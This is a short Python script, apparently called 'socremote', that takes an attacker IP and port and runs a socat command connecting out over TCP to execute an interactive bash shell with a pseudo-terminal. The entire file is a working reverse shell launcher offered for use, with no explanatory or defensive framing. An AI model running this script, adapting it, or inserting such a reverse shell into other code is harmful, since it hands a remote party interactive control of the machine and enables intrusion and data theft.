#! /usr/bin/env python3

 
import os
import sys
import argparse


def ip_port(string):
    try:
        ip, port = string.split(":")
        return ip, port
    except ValueError:
        raise argparse.ArgumentTypeError("Input should be in the format attackerIP:attackerPORT")

parser = argparse.ArgumentParser()
parser.add_argument("ip", help="FORMAT: socremote attackerIP:attackerPORT", type=ip_port)
args = parser.parse_args()


ip, port = args.ip

print ("ip: "+ip+"\nport: " +port)
command = f'socat TCP:{ip}:{port} EXEC:"bash -li",pty,stderr,sigint,setsid,sane'
print(command)
os.system(command)
